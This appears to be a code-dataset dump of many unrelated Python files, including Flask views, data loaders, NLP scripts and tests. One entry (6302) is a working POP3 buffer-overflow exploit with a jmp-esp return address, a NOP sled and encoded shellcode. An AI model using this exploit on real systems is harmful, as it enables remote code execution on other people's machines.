index int64 0 1,000k | blob_id stringlengths 40 40 | code stringlengths 7 10.4M |
|---|---|---|
6,300 | 29428e9ca4373c9f19d1412046ebe4fc3b1c48e3 | #!/usr/bin/python
"""Source base class.
Based on the OpenSocial ActivityStreams REST API:
http://opensocial-resources.googlecode.com/svn/spec/2.0.1/Social-API-Server.xml#ActivityStreams-Service
"""
__author__ = ['Ryan Barrett <activitystreams@ryanb.org>']
import datetime
try:
import json
except ImportError:
import simplejson as json
import logging
from webob import exc
from google.appengine.api import urlfetch
ME = '@me'
SELF = '@self'
ALL = '@all'
FRIENDS = '@friends'
APP = '@app'
class Source(object):
"""Abstract base class for a source (e.g. Facebook, Twitter).
Concrete subclasses must override the class constants below and implement
get_activities().
OAuth credentials may be extracted from the current request's query parameters
e.g. access_token_key and access_token_secret for Twitter (OAuth 1.0a) and
access_token for Facebook (OAuth 2.0).
Attributes:
handler: the current RequestHandler
Class constants:
DOMAIN: string, the source's domain
FRONT_PAGE_TEMPLATE: string, the front page child template filename
AUTH_URL = string, the url for the "Authenticate" front page link
"""
def __init__(self, handler):
self.handler = handler
def get_activities(self, user_id=None, group_id=None, app_id=None,
activity_id=None, start_index=0, count=0):
"""Return a total count and list of ActivityStreams activities.
If user_id is provided, only that user's activity(s) are included.
start_index and count determine paging, as described in the spec:
http://activitystrea.ms/draft-spec.html#anchor14
app id is just object id
http://opensocial-resources.googlecode.com/svn/spec/2.0/Social-Data.xml#appId
group id is string id of group or @self, @friends, @all
http://opensocial-resources.googlecode.com/svn/spec/2.0/Social-Data.xml#Group-ID
Args:
user_id: string object id, defaults to the currently authenticated user
group_id: string object id, defaults to the current user's friends
app_id: string object id
activity_id: string object id
start_index: int >= 0
count: int >= 0
Returns:
(total_results, activities) tuple
total_results: int or None (e.g. if it can't be calculated efficiently)
activities: list of activity dicts to be JSON-encoded
"""
raise NotImplementedError()
def urlfetch(self, url, **kwargs):
"""Wraps urlfetch. Passes error responses through to the client.
...by raising HTTPException.
Args:
url: str
kwargs: passed through to urlfetch.fetch()
Returns:
the HTTP response body
"""
logging.debug('Fetching %s with kwargs %s', url, kwargs)
resp = urlfetch.fetch(url, deadline=999, **kwargs)
if resp.status_code == 200:
return resp.content
else:
logging.warning('GET %s returned %d:\n%s',
url, resp.status_code, resp.content)
self.handler.response.headers.update(resp.headers)
self.handler.response.out.write(resp.content)
raise exc.status_map.get(resp.status_code)(resp.content)
def tag_uri(self, name):
"""Returns a tag URI string for this source and the given string name.
Example return value: 'tag:twitter.com,2012:snarfed_org/172417043893731329'
Background on tag URIs: http://taguri.org/
"""
return 'tag:%s,%d:%s' % (self.DOMAIN, datetime.datetime.now().year, name)
|
6,301 | 348676e43e4dfbbe7cd0c0527acb8c613d3d1ebc | #!/usr/bin/env python
import sys
from static_pipeline import render
from static_pipeline.lib import argparse
if __name__ == "__main__":
""" Use argparse to decide what to do
"""
# set up arg parsing
parser = argparse.ArgumentParser(
description='render and rearrange files ' \
'(presumably for serving them as part of a website)')
subparsers = parser.add_subparsers(title='commands', dest="command")
# render command
parser_render = subparsers.add_parser('render', help='render files ' \
'with static-pipeline (based on contents of the settings file)')
parser_render.add_argument('--settings-file', default='pipeline_settings')
# parse (if no command specified, show help)
if len(sys.argv) < 2:
sys.argv.append('--help')
parsed = parser.parse_args()
if parsed.command == "render":
try:
# for whatever reason, sometimes current dir doesn't end up on the pythonpath
sys.path.append('.')
pipeline_settings = __import__(parsed.settings_file)
pipeline = pipeline_settings.PIPELINE
except ImportError:
print "No settings file: {0}.py".format(parsed.settings_file)
sys.exit(1)
except AttributeError:
print "No PIPELINE in settings file. Nothing to do."
sys.exit(0)
render(pipeline, pipeline_settings)
|
6,302 | 280a4e1fb35937bb5a5c604f69337d30a4b956a9 | #!/usr/bin/env python2
import socket
import struct
RHOST = "10.10.10.2"
RPORT = 110
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((RHOST, RPORT))
# OFFSETS
# EIP 4654
# ESP 342
# EBP 4650
# jmp_esp in slmfc.dll at 5f4a358f
jmp_esp = 0x5f4a358f
nop_sled = "\x90" * 32
buf_totlen = 5000
offset_srp = 4654
shellcode_calc = b""
shellcode_calc += b"\xba\xd5\x90\xd2\x7d\xdb\xd5\xd9\x74\x24"
shellcode_calc += b"\xf4\x58\x31\xc9\xb1\x36\x31\x50\x13\x83"
shellcode_calc += b"\xe8\xfc\x03\x50\xda\x72\x27\x81\x0c\xf0"
shellcode_calc += b"\xc8\x7a\xcc\x95\x41\x9f\xfd\x95\x36\xeb"
shellcode_calc += b"\xad\x25\x3c\xb9\x41\xcd\x10\x2a\xd2\xa3"
shellcode_calc += b"\xbc\x5d\x53\x09\x9b\x50\x64\x22\xdf\xf3"
shellcode_calc += b"\xe6\x39\x0c\xd4\xd7\xf1\x41\x15\x10\xef"
shellcode_calc += b"\xa8\x47\xc9\x7b\x1e\x78\x7e\x31\xa3\xf3"
shellcode_calc += b"\xcc\xd7\xa3\xe0\x84\xd6\x82\xb6\x9f\x80"
shellcode_calc += b"\x04\x38\x4c\xb9\x0c\x22\x91\x84\xc7\xd9"
shellcode_calc += b"\x61\x72\xd6\x0b\xb8\x7b\x75\x72\x75\x8e"
shellcode_calc += b"\x87\xb2\xb1\x71\xf2\xca\xc2\x0c\x05\x09"
shellcode_calc += b"\xb9\xca\x80\x8a\x19\x98\x33\x77\x98\x4d"
shellcode_calc += b"\xa5\xfc\x96\x3a\xa1\x5b\xba\xbd\x66\xd0"
shellcode_calc += b"\xc6\x36\x89\x37\x4f\x0c\xae\x93\x14\xd6"
shellcode_calc += b"\xcf\x82\xf0\xb9\xf0\xd5\x5b\x65\x55\x9d"
shellcode_calc += b"\x71\x72\xe4\xfc\x1f\x85\x7a\x7b\x6d\x85"
shellcode_calc += b"\x84\x84\xc1\xee\xb5\x0f\x8e\x69\x4a\xda"
shellcode_calc += b"\xeb\x96\xa8\xcf\x01\x3f\x75\x9a\xa8\x22"
shellcode_calc += b"\x86\x70\xee\x5a\x05\x71\x8e\x98\x15\xf0"
shellcode_calc += b"\x8b\xe5\x91\xe8\xe1\x76\x74\x0f\x56\x76"
shellcode_calc += b"\x5d\x61\x3d\xfc\x7e\x0b\xce\x99\x0c\xd3"
shellcode_calc += b"\x1f\x03\x95\x77\x7f\xa5\x34\x13\x1a\x09"
shellcode_calc += b"\xd1\x82\x8f\x2c\x2f\x35\x2e\xdc\x3c\xb5"
buf = ""
buf += "A" * (offset_srp - len(buf))
buf += struct.pack("<I", jmp_esp)
buf += nop_sled
buf += shellcode_calc
buf += "D"*(buf_totlen - len(buf))
data = s.recv(1024)
s.send('USER username' + '\r\n')
data = s.recv(1024)
s.send('PASS ' + buf + '\r\n')
data = s.recv(1024)
s.close
|
6,303 | 9a6f4f0eac5d9e5b4b92fcb2d66d39df15b3b281 | # -*- coding: utf-8 -*-
from flask import abort, flash, redirect, render_template, url_for, request
from flask_login import current_user, login_required
from . import user
from .. import db
from models import User
def check_admin():
"""
Prevent non-admins from accessing the page
"""
if not current_user.is_admin:
abort(403)
@user.route('/users')
@login_required
def list_users():
"""
List all users ordered by latest
"""
check_admin()
results = User.query.order_by(-User.id)
return render_template('user_list.html', users=results)
#@login_required
@user.route('/users/add', methods=['GET', 'POST'])
def add_user():
"""
load form page and add to the database
"""
#check_admin()
# if form submit
if request.method == 'POST':
# create new user with UI form data
user = User(username=request.form['username'],
password=request.form['password'],
is_admin=request.form.getlist('is_admin'))
try:
# add user to the database
db.session.add(user)
db.session.commit()
# message to the UI
flash('Utilizador adicionado com sucesso.', 'success')
# redirect to the users page
return redirect(url_for('user.list_users'))
except:
# in case user name already exists
flash('Erro: username já existe.', 'danger')
return redirect(url_for('user.add_user'))
# load add user form template
return render_template('user_add.html')
@user.route('/users/edit/<int:id>', methods=['GET', 'POST'])
@login_required
def edit_user(id):
check_admin()
# get user or error
user = User.query.get_or_404(id)
if request.method == 'POST':
# update user with UI form data
user.username = request.form['username']
user.password = request.form['password']
user.is_admin = request.form.getlist('is_admin')
# update user in database
db.session.commit()
# message to the UI
flash('Utilizador alterado com sucesso.', 'success')
# redirect to the users page
return redirect(url_for('user.list_users'))
return render_template('user_edit.html', user=user)
@user.route('/users/delete/<int:id>', methods=['GET', 'POST'])
@login_required
def delete_user(id):
"""
Delete from database
"""
check_admin()
# get user or error
user = User.query.get_or_404(id)
db.session.delete(user)
db.session.commit()
flash('Utilizador removido com sucesso.', 'success')
# redirect to the users page
return redirect(url_for('user.list_users'))
|
6,304 | 62a86bd33755510f0d71f4920e63be1a3ce8c563 | from bs4 import BeautifulSoup
import urllib.request
import re
import math
url_header = "http://srh.bankofchina.com/search/whpj/search.jsp?erectDate=2016-01-25¬hing=2016-02-25&pjname=1314"
Webpage = urllib.request.urlopen(url_header).read()
Webpage=Webpage.decode('UTF-8')
# soup = BeautifulSoup(Webpage)
print (Webpage)
a=re.findall(r'var m_nRecordCount = (\d+)',str(Webpage))
print(a)
# page_count=soup.find('script')
# print(page_count)
total_page=math.ceil(int(a[0])/20)
print(total_page) |
6,305 | 870de8888c00bbf9290bcc847e2a4fbb823cd4b7 | import math
import sys
from PIL import Image
import numpy as np
import torch
from torch.utils.data import Dataset
from sklearn.gaussian_process.kernels import RBF
from sklearn.gaussian_process import GaussianProcessRegressor
sys.path.append("..")
from skssl.utils.helpers import rescale_range
__all__ = ["SineDataset", "GPDataset"]
class GPDataset(Dataset):
"""
Dataset of functions generated by a gaussian process.
Parameters
----------
kernel : sklearn.gaussian_process.kernels
The kernel specifying the covariance function of the GP. If None is
passed, the kernel "1.0 * RBF(1.0)" is used as default.
n_samples : int, optional
Number of sampled functios contained in dataset.
n_points : int, optional
Number of points at which to evaluate f(x) for x in min_max.
min_max : tuple of floats, optional
Min and max point at which to evaluate the function (bounds).
"""
def __init__(self,
kernel=1. * RBF(length_scale=1.),
min_max=(-5, 5),
n_samples=1000,
n_points=100):
self.n_samples = n_samples
self.n_points = n_points
self.min_max = min_max
self.gp = GaussianProcessRegressor(kernel=kernel)
self.data, self.targets = self.precompute_data()
def __len__(self):
return self.n_samples
def __getitem__(self, index):
# doesn't use index because randomly gnerated in any case => sample
# in order which enables to know when epoch is finished and regenerate
# new functions
self.counter += 1
if self.counter == self.n_samples:
self.data, self.targets = self.precompute_data()
return self.data[self.counter], self.targets[self.counter]
def precompute_data(self, min_max=None, n_samples=None, ):
self.counter = 0
return self._precompute_helper(self.min_max, self.n_samples, self.n_points)
def _precompute_helper(self, min_max, n_samples, n_points):
# sample from a grid
X = np.linspace(*min_max, n_points)
# add noise (with standard deviation of "stepsize") to not be on a grid
X += np.random.randn(*X.shape) * (min_max[1] - min_max[0]) / n_points
# make sure that still in bound
X = X.clip(min=min_max[0], max=min_max[1])
# sort which is convenient for plotting
X.sort()
targets = self.gp.sample_y(X[:, np.newaxis], n_samples).transpose(1, 0)
targets = torch.from_numpy(targets)
targets = targets.view(n_samples, n_points, 1).float()
X = torch.from_numpy(X)
X = X.view(1, -1, 1).expand(n_samples, n_points, 1).float()
# rescale features to [-1,1]
# uses `self.min_max` like that possible to precompute extrapolation data
X = rescale_range(X, self.min_max, (-1, 1))
return X, targets
def extrapolation_samples(self, n_samples=1, test_min_max=None, n_points=None):
"""Return a batch of extrapolation
Parameters
----------
n_samples : int, optional
Number of sampled function (i.e. batch size).
test_min_max : float, optional
Testing range. If `None` uses training one.
n_points : int, optional
Number of points at which to evaluate f(x) for x in min_max. If None
uses `self.n_points`.
"""
if test_min_max is None:
test_min_max = self.min_max
n_points = n_points if n_points is not None else self.n_points
return self._precompute_helper(test_min_max, n_samples, n_points)
class SineDataset(Dataset):
"""
Dataset of functions f(x) = a * sin(x - b) where a and b are randomly
sampled.
Notes
-----
- modified from: https://github.com/EmilienDupont/neural-processes/
Parameters
----------
amplitude_range : tuple of float, optional
Defines the range from which the amplitude (i.e. a) of the sine function
is sampled.
shift_range : tuple of float, optional
Defines the range from which the shift (i.e. b) of the sine function is
sampled.
n_samples : int, optional
Number of sampled functios contained in dataset.
n_points : int, optional
Number of points at which to evaluate f(x) for x in min_max.
std_noise : float, optional
Standard deviation of the noise to add
min_max : tuple of floats, optional
Min and max point at which to evaluate the function (bounds).
"""
def __init__(self,
amplitude_range=(-1., 1.),
shift_range=(-.5, .5),
n_samples=1000,
n_points=100,
std_noise=0.01,
min_max=(-math.pi, math.pi)):
self.amplitude_range = amplitude_range
self.shift_range = shift_range
self.n_samples = n_samples
self.n_points = n_points
self.x_dim = 1 # x and y dim are fixed for this dataset.
self.y_dim = 1
self.std_noise = std_noise
self.min_max = min_max
# Generate data
a_min, a_max = amplitude_range
b_min, b_max = shift_range
# Sample random amplitude
a = (a_max - a_min) * torch.rand(n_samples, 1, self.y_dim) + a_min
# Sample random shift
b = (b_max - b_min) * torch.rand(n_samples, 1, self.y_dim) + b_min
# Shape (n_samples, n_points, x_dim)
self.data = torch.linspace(*self.min_max, n_points)
self.data = self.data.view(1, -1, 1).expand(self.n_samples, self.n_points, self.x_dim)
# Shape (n_samples, n_points, y_dim)
self.targets = (a * torch.sin(self.data - b)
) + torch.randn_like(self.data) * self.std_noise
# rescale features to [-1,1]
self.data = rescale_range(self.data, self.min_max, (-1, 1))
def __getitem__(self, index):
return self.data[index], self.targets[index]
def __len__(self):
return self.n_samples
|
6,306 | ddb139fa3fbfa1218459e3865150465a44a03bea | # Created by Yuexiong Ding
# Date: 2018/9/4
# Description:
|
6,307 | c7d8a67587a6ca01c23ed922faabbaca8bbaf337 | import time
import threading
lock_a = threading.Lock()
lock_b = threading.Lock()
def task1():
print('Task 1 is starting...')
print('Task 1 is waiting to acquire Lock A')
with lock_a:
print('Task 1 has acquired Lock A')
print('Task 1 is doing some calculations')
time.sleep(2)
print('Task 1 is waiting to acquire Lock B')
with lock_b:
print('Task 1 has acquired Lock B')
print('Task 1 is doing some calculations')
time.sleep(2)
print('Task 1 is releasing both locks')
def task2():
print('Task 2 is starting...')
print('Task 2 is waiting to acquire Lock B')
with lock_b:
print('Task 2 has acquired Lock B')
print('Task 2 is doing some calculations')
time.sleep(5)
print('Task 2 is waiting to acquire Lock A')
with lock_a:
print('Task 2 has acquired Lock A')
print('Task 2 is doing some calculations')
time.sleep(5)
print('Task 2 is releasing both locks')
if __name__ == '__main__':
t1 = threading.Thread(target=task1)
t2 = threading.Thread(target=task2)
t1.start()
t2.start()
t1.join()
t2.join()
|
6,308 | 3a5d55ea5a2f4f6cf7aaf55055593db9f8bb3562 | # Generated by Django 3.0.7 on 2020-07-03 11:08
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('descriptor', '0007_auto_20200702_1653'),
]
operations = [
migrations.CreateModel(
name='Parameter',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=40, verbose_name='name')),
('format', models.CharField(choices=[('AN', 'alphanumeric'), ('NB', 'number'), ('AR', 'array')], max_length=2, verbose_name='format')),
('size', models.CharField(max_length=20, verbose_name='size')),
('required', models.BooleanField(default=True, verbose_name='required')),
('domain_rules', models.CharField(max_length=120, verbose_name='domain rules')),
],
options={
'verbose_name': 'parameter',
'verbose_name_plural': 'parameter',
},
),
migrations.AlterField(
model_name='service',
name='http_method',
field=models.CharField(choices=[('GET', 'GET'), ('POST', 'POST'), ('PUT', 'PUT'), ('DELETE', 'DELETE'), ('PATCH', 'PATCH')], max_length=6, verbose_name='method'),
),
migrations.AlterField(
model_name='service',
name='status',
field=models.CharField(choices=[('ST', 'under study'), ('DV', 'under development'), ('HM', 'under test'), ('DP', 'deployed')], max_length=2),
),
migrations.CreateModel(
name='Request',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('parameter', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='descriptor.Parameter')),
('service', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='descriptor.Service')),
],
options={
'verbose_name': 'request',
'verbose_name_plural': 'requests',
},
),
]
|
6,309 | bb3cba9847f2318a5043975e4b659265a7442177 | #def pizzaTopping():
message1 = "What Pizza do you want?"
message = "What type of Pizza topping do you want?"
message += "\n Enter 'quit' to stop entering toppings"
pizzas = {}
while True:
pizza = input(message1)
topping = input(message)
if topping == "quit":
break
else:
pizzas[pizza] = topping
#toppings.append(topping)
#return toppings
#print(pizzaTopping())
#print('We will add the following toppings: ' + str(toppings))
print(pizzas) |
6,310 | a9b7abaaaa811cf12a15def1f2dd21f95bac3d62 | from django import forms
from django.conf import settings
class SurveyFeedback(forms.Form):
CHOICES = [('Very Satisfied', 'Very Satisfied'), ('Satisfied', 'Satisfied'), ('Neither', 'Neither'), ('Dissatisfied', 'Dissatisfied'), ('Very Dissatisfied', 'Very Dissatisfied')]
radioFeedback = forms.ChoiceField(label='How satisfied were you with the service you just received?', choices=CHOICES, widget=forms.RadioSelect(), required=False)
textFeedback = forms.CharField(label='Survey Feedback', max_length=settings.MAX_CHARS, required=False, widget=forms.Textarea(attrs={'rows': 10, 'cols': 80, 'onKeyDown':'return setTimeout(remainingChars('+str(settings.MAX_CHARS)+'), 100);'}))
|
6,311 | cca9d91fe20e58f233ccfc4100edb748356ed234 | """
Plot funcs
Jan, 2018 Rose Yu @Caltech
"""
import matplotlib.pyplot as plt
import seaborn as sns
from util.matutil import *
from util.batchutil import *
def plot_img():
"""
plot ground truth (left) and reconstruction (right)
showing b/w image data of mnist
"""
plt.subplot(121)
plt.imshow(data.data.numpy()[0,].squeeze())
plt.subplot(122)
plt.imshow(dec_mean.view(-1,28,28).data.numpy()[0,].squeeze())
plt.show()
plt.pause(1e-6)
plt.gcf().clear()
sample = model.sample_z(data)
plt.imshow(sample)
def plot_kde():
"""
plot the kernel density estimation for 2d distributions
"""
f, (ax1, ax2) = plt.subplots(1, 2, sharey=True, sharex=True)
sns.kdeplot(data.data.numpy()[:,0], data.data.numpy()[:,1], color="r", shade=True, ax=ax1)
sns.kdeplot(dec_mean.data.numpy()[:,0], dec_mean.data.numpy()[:,1], color="b", shade=True, ax=ax2)
plt.show()
plt.pause(1e-6)
plt.gcf().clear()
def plot_ts(data, enc_mean, dec_mean):
"""
plot time series with uncertainty
"""
# enc_mean, enc_cov = enc
# dec_mean, dec_cov = dec
batch_size = data.size()[0]
D = 2
N = int(data.size()[1]/D)
f, (ax1, ax2, ax3) = plt.subplots(1, 3, sharey=False, sharex=True)
# plot data
plt.axes(ax1)
ax1.set_ylim(-0.1,0.1)
sns.tsplot(data.view(batch_size,N,-1).data.numpy())
# plot reconstruction
plt.axes(ax2)
ax2.set_ylim(-0.1,0.1)
sns.tsplot(dec_mean.view(batch_size,N,-1).data.numpy())
plt.axes(ax3)
sample_Sigma = bivech2(enc_mean.view(batch_size,N,-1))
sample_vechSigma = bvech(sample_Sigma).data.numpy()
sns.tsplot(sample_vechSigma)
# plot latent variables
# sample_Sigma = ivech2x(enc_cov.data.numpy())
# sample_vechSigma = vechx(sample_Sigma.reshape((-1,N,N)))
# sns.tsplot(sample_vechSigma)
|
6,312 | 1711f74fae36ba761a7c0d84b95271b4e5043d27 | from app import db, session, Node_Base, Column, relationship
from datetime import datetime
import models
import os
import json
|
6,313 | 6f3aa4e1309745265bb9d79df5f5a352e54493f9 | #!/usr/bin/env python
#coding:utf-8
import jieba.analyse as analyse
from collections import Counter
import time
from os import path
import jieba
import importlib, sys
importlib.reload(sys)
import csv
import pandas as pd
from pandas import DataFrame
jieba.load_userdict("newdict.txt")
d = path.dirname(__file__)
filepath = r'C:\Users\Lenovo\zqrbtest\redup.csv'
def removdup():
train = pd.read_csv(r'C:\Users\Lenovo\zqrbtest\data.csv')
train = train['titlec']
train = set(train)
data = pd.DataFrame(list(train), columns=['titlec'])
data.to_csv('redup.csv', index=False, encoding='utf_8_sig')
if __name__ == "__main__":
def stopwordslist(filepath):
stopwords = [line.strip()for line in open(filepath, 'r', encoding='utf-8').read().split('\n')]
rs2 = []
return stopwords
def seg_sentence (sentence):
sentence_seged = jieba.cut(sentence.strip())
stopwords = stopwordslist('stop.txt')
outstr = ''
for word in sentence_seged:
if word not in stopwords:
if word != '\t':
outstr += word
outstr += " "
return outstr
inputs = open('redup.csv', 'r', encoding='utf-8')
outputs = open('hel.csv', 'w', encoding='utf-8')
for line in inputs:
line_seg = seg_sentence(line)
outputs.write(line_seg + '\n')
outputs.close()
inputs.close()
if __name__ == "__main__":
aResult = removdup()
csvfile = open('wordCount.csv', 'w', newline='', encoding='utf_8_sig')
spamwriter = csv.writer(csvfile)
word_list = []
key_list = []
for line in open('hel.csv', 'r', encoding='UTF-8'):
item = line.strip('\n\r').split('\t')
tags = jieba.analyse.extract_tags(item[0])
for t in tags:
word_list.append(t)
word_dict = {}
with open("result3.txt", 'w') as wf2:
for item in word_list:
if item not in word_dict:
word_dict[item] = 1
else:
word_dict[item] += 1
orderList = list(word_dict.values())
orderList.sort(reverse=True)
for i in range(len(orderList)):
for key in word_dict:
if word_dict[key] == orderList[i]:
wf2.write(key + ' ' + str(word_dict[key]) + '\n')
key_list.append(key)
word_dict[key] = 0
for i in range(len(key_list)):
spamwriter.writerow((key_list[i], orderList[i]))
csvfile.close()
rf_path = 'wordcount.csv'
title = ['keyut', 'fre']
r2g = pd.read_csv(rf_path, header=None)
insertRow = pd.DataFrame([title])
r2g = insertRow.append(r2g, ignore_index=True)
df = r2g.to_csv('wordcount-1.csv', header=None, index=None, encoding='utf_8_sig')
a = pd.read_csv('wordcount-1.csv')
a.set_index('keyut')
b = pd.read_csv('total.csv', encoding='utf_8_sig', engine='python')
b.set_index('keyut')
c = pd.merge(b, a, on='keyut', how='left')
c.to_csv('collection.csv', encoding='utf_8_sig')
|
6,314 | 299d13fbcdb75673026db1e3a0352c8b19d453c1 | import paho.mqtt.client as paho
import RPi.GPIO as GPIO
import json, time, math
import clearblade
from clearblade import auth
from clearblade import Client
from urlparse import urlparse
#Fill init values
systemKey = ______
secretKey = ______
userName = _______
userPW = _______
edgeIP = "http://_______:9000"
auth = auth.Auth()
userClient = Client.UserClient(systemKey, secretKey, userName, userPW, edgeIP)
auth.Authenticate(userClient)
print "Authenticated"
sequence = [
[1,1,0,0],
[0,1,1,0],
[0,0,1,1],
[1,0,0,1]
]
ccwseq = [
[1,0,0,1],
[0,0,1,1],
[0,1,1,0],
[1,1,0,0]
]
time.sleep(1)
GPIO.setmode(GPIO.BOARD)
controlPinArray = [31, 33, 35,37]
for pin in controlPinArray:
GPIO.setup(pin, GPIO.OUT)
GPIO.output(pin,0)
# Stepper motor logic
def StepMotor(controlState, angle):
step = math.ceil(int(angle) * 1.4222222)
print step
stepAngle = int(step)
print "Step Angle "+str(stepAngle)
if controlState == "CW":
for i in range(stepAngle):
for fullStep in range(4):
for pin in range(4):
GPIO.output(controlPinArray[pin], sequence[fullStep][pin])
time.sleep(0.0015)
else:
for i in range(stepAngle):
for halfStep in range(4):
for pin in range(4):
GPIO.output(controlPinArray[pin], ccwseq[halfStep][pin])
time.sleep(0.002)
# Define event callbacks
def on_connect(mosq, obj, rc):
print("rc: " + str(rc))
def on_message(mosq, obj, msg):
print(msg.topic + " " + str(msg.qos) + " " + str(msg.payload))
command = msg.payload
commandJson = json.loads(command)
controlState = str(commandJson['controlState'])
angle = commandJson['state']
print ("Control State :"+controlState)
print ("Angle:"+str(angle))
StepMotor(controlState, angle)
print "Done"
def on_publish(mosq, obj, mid):
print("mid: " + str(mid))
def on_subscribe(mosq, obj, mid, granted_qos):
print("Subscribed: " + str(mid) + " " + str(granted_qos))
def on_log(mosq, obj, level, string):
print(string)
mqttc = paho.Client()
# Assign event callbacks
mqttc.on_message = on_message
mqttc.on_connect = on_connect
mqttc.on_publish = on_publish
mqttc.on_subscribe = on_subscribe
# Connect to clearblade
mqttc.username_pw_set(userClient.UserToken, userClient.systemKey)
msgAddr = urlparse(userClient.platform)
msgAddr = msgAddr.hostname
mqttc.connect(msgAddr,"1883", 30)
# Start subscribe, with QoS level 0
mqttc.subscribe("motor/angle", 0)
# Continue the network loop, exit when an error occurs
rc = 0
while rc == 0:
rc = mqttc.loop()
|
6,315 | 2c58a9e83f80d437160b87ec64c7631e7a35bf90 | import os, pickle, logging, numpy as np
from .. import utils as U
class CMU_Generator():
def __init__(self, args, dataset_args):
self.in_path = dataset_args['cmu_data_path']
self.out_path = '{}/{}'.format(dataset_args['path'], args.dataset)
self.actions = ['walking', 'running', 'directing_traffic', 'soccer',
'basketball', 'washwindow', 'jumping', 'basketball_signal']
self.dim_ignore = [0, 1, 2, 3, 4, 5, 6, 7, 8, 21, 22, 23, 24, 25, 26,
39, 40, 41, 60, 61, 62, 63, 64, 65, 81, 82, 83,
87, 88, 89, 90, 91, 92, 108, 109, 110, 114, 115, 116]
self.dim_use = list(set(range(39*3)).difference(set(self.dim_ignore)))
U.create_folder(self.out_path)
def start(self):
logging.info('Reading data ...')
self.all_train_data, train_data = self.read_data('train')
_, eval_data = self.read_data('test')
logging.info('Normalizing data ...')
self.data_mean, self.data_std, self.dim_zero, self.dim_nonzero = self.normalize_state()
train_data = self.normalize_data(train_data)
eval_data = self.normalize_data(eval_data)
logging.info('Saving data ...')
with open('{}/data.pkl'.format(self.out_path), 'wb') as f:
pickle.dump((train_data, eval_data, self.actions), f)
with open('{}/normalization.pkl'.format(self.out_path), 'wb') as f:
pickle.dump((self.data_mean, self.data_std, self.dim_zero, self.dim_nonzero), f)
with open('{}/ignore.pkl'.format(self.out_path), 'wb') as f:
pickle.dump((self.dim_use, self.dim_ignore), f)
def read_data(self, phase):
all_data, even_data = [], {}
for action_idx, action in enumerate(self.actions):
action_path = '{}/{}/{}'.format(self.in_path, phase, action)
for sequence_idx, file in enumerate(os.listdir(action_path)):
sequence = []
with open('{}/{}'.format(action_path, file), 'r') as f:
for line in f.readlines():
line = line.strip().split(',')
if len(line) > 0:
sequence.append(np.array([np.float32(x) for x in line]))
sequence = np.array(sequence)
all_data.append(sequence)
even_data[(action_idx, sequence_idx)] = sequence[range(0,sequence.shape[0],2),:]
return np.concatenate(all_data, axis=0), even_data
def normalize_state(self):
data_mean = np.mean(self.all_train_data, axis=0)
data_std = np.std(self.all_train_data, axis=0)
dim_zero = list(np.where(data_std < 0.0001)[0])
dim_nonzero = list(np.where(data_std >= 0.0001)[0])
data_std[dim_zero] = 1.0
return data_mean, data_std, dim_zero, dim_nonzero
def normalize_data(self, data):
for key in data.keys():
data[key] = np.divide((data[key] - self.data_mean), self.data_std)
data[key] = data[key][:, self.dim_use]
return data
|
6,316 | fc2a123f8a86d149af9fc73baa360a029fcde574 |
""" Unit test for the Supermarket checkout exercise """
import unittest
from decimal import *
from ShoppingCart import *
# Unit tests -----
class ScannerTests(unittest.TestCase):
def setUp(self):
pricingRulesWithSingleDiscount = { 'Apple': { 1 : '0.50' , 3 : '1.30' },
'Orange': {1 : '0.20'},
'Tomato': {1 : '1.25'},
'Cucumber': {1 : '0.10'}
}
pricingRulesWithMultipleDiscounts = { 'Apple': { 1 : '0.50' , 3 : '1.30' , 5 : '2.00' },
'Orange': {1 : '0.20' , 4 : '.60'},
'Tomato': {1 : '1.25' , 2 : '.62', 5 : '2.50', 10 : '2.00'},
'Cucumber': {1 : '0.10'}
}
self.singleItemListOneDiscount = createInventoryList(pricingRulesWithSingleDiscount)
self.multipleDiscountsItemList = createInventoryList(pricingRulesWithMultipleDiscounts)
def testScaningItems(self):
scanner = Scanner(self.singleItemListOneDiscount)
groceryList = ['Apple','Orange','Tomato', 'Apple', 'Orange','Cucumber']
scanner.scanItems(groceryList)
self.failIf(self.singleItemListOneDiscount['Apple'].numberOfItems != 2)
self.failIf(self.singleItemListOneDiscount['Orange'].numberOfItems != 2)
self.failIf(self.singleItemListOneDiscount['Tomato'].numberOfItems != 1)
self.failIf(self.singleItemListOneDiscount['Cucumber'].numberOfItems != 1)
def testPricingZeroItems(self):
scanner = Scanner(self.singleItemListOneDiscount)
emptyGroceryList = []
scanner.scanItems(emptyGroceryList)
self.assertEqual(Decimal("0"),scanner.totalPrice())
def testPricingSingleItems(self):
scanner = Scanner(self.singleItemListOneDiscount)
groceryList = ['Apple','Orange','Tomato', 'Apple', 'Orange','Cucumber']
scanner.scanItems(groceryList)
self.assertTrue(self.singleItemListOneDiscount['Apple'].finalCost() == Decimal('1.00'))
self.assertTrue(self.singleItemListOneDiscount['Orange'].finalCost() == Decimal('0.40'))
self.assertTrue(self.singleItemListOneDiscount['Tomato'].finalCost() == Decimal('1.25'))
self.assertTrue(self.singleItemListOneDiscount['Cucumber'].finalCost() == Decimal('0.10'))
self.assertEqual(Decimal("2.75"),scanner.totalPrice())
def testPricingSingleItemsWithExactDiscount(self):
scanner = Scanner(self.singleItemListOneDiscount)
groceryList = ['Apple','Orange','Orange', 'Apple', 'Orange','Apple']
scanner.scanItems(groceryList)
self.assertTrue(self.singleItemListOneDiscount['Apple'].finalCost() == Decimal('1.30'))
self.assertTrue(self.singleItemListOneDiscount['Orange'].finalCost() == Decimal('0.60'))
self.assertEqual(Decimal("1.90"),scanner.totalPrice())
def testPricingMultipleItemsBeyondDiscounts(self):
scanner = Scanner(self.singleItemListOneDiscount)
groceryList = ['Apple','Tomato','Cucumber','Apple','Cucumber','Apple','Apple']
scanner.scanItems(groceryList)
self.assertTrue(self.singleItemListOneDiscount['Apple'].finalCost() == Decimal('1.80'))
self.assertTrue(self.singleItemListOneDiscount['Tomato'].finalCost() == Decimal('1.25'))
self.assertTrue(self.singleItemListOneDiscount['Cucumber'].finalCost() == Decimal('0.20'))
self.assertEqual(Decimal("3.25"),scanner.totalPrice())
def testPricingMultipleItemsWithMultipleDiscounts(self):
scanner = Scanner(self.multipleDiscountsItemList)
